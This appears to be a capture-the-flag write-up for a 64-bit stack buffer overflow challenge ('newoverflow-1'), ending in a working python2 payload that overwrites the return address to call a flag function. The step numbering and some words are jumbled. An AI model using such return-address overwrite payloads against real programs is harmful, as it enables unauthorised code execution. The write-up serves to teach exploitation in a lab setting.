Comment on page
Lets try moving to 64-bit, but don't worry we'll start easy. Overflow the buffer and change the return address to the flag function in this program. You can find it in /problems/newoverflow-1_3_e53f871ba121b62d35646880e2577f89 on the shell server. Source.
- 1.Find the offset/padding
pdf @ sym.vulnto get
var int local_40h @ rbp-0x40
0x40is the buffer location so 8 more bytes are needed to get past the "saved ebp register"
- 6.So the offset is
readelf -s vulnto get the address of
- 3.We can not offset and call the
flagfunction directly because that would cause a stack misalignment in 64-bit. So instead we form out payload by doing
padding + main_address + flag_addressinstead of just
padding + flag_addressas we would in 32-bit.
- 4.We can use
p64from pwntools to convert the hex addresses to little endian.
- 5.Payload complete:
python2 -c "print 'A'*72 + '\xcb\x07@\x00\x00\x00\x00\x00' + 'g\x07@\x00\x00\x00\x00\x00'" | ./vuln